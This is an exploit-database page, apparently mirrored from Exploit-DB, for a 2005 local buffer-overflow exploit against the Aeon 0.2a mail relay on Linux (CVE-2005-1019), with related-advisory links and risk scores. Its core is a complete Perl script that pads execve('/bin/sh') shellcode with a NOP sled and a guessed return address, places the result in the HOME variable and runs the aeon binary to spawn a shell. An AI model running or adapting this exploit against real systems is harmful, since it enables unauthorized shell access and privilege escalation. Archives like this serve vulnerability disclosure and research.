Lucene search
+L

Aeon 0.2a - Local Linux (1)

🗓️ 05 Apr 2005 00:00:00Reported by lammatType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Linux script for Aeon mail relay with shellcode execution vulnerability exploit.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2005-1019
9 Apr 200504:00
cve
cvelist
Cvelist
CVE-2005-1019
9 Apr 200504:00
cvelist
exploitdb
Exploit DB
Aeon 0.2a - Local Linux (2)
5 Apr 200500:00
exploitdb
euvd
EUVD
EUVD-2005-1022
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-1019
2 May 200504:00
nvd
#!/usr/bin/perl
#                       Aeon-mail relay agent for Linux                                   *
#                                                                                         *
#           written by lammat just for practice purposes                                  *
#                       tested against aeon-0.2a                                          *
#                       http://grpower.ath.cx		                                  *
#		          [email protected]			                          *


#  execve(/bin/sh) for linux x86
#   29 bytes
#   by Matias Sedalo



$shellcode =
"\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68".
"\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";


$buf = 528;
$ret = 0xbfffe122;
$nop = "\x90";

if (@ARGV == 1) {
$offset = $ARGV[0];
}

for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}


$buffer .= $shellcode;


print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");


$new_ret = pack('l', ($ret + $offset));

until (length($buffer) == $buf) {
$buffer .= $new_ret;
}

local($ENV{'HOME'}) = $buffer; exec("/home/lammat/aeon-0.2a/aeon $i");

# milw0rm.com [2005-04-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 May 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.01106
40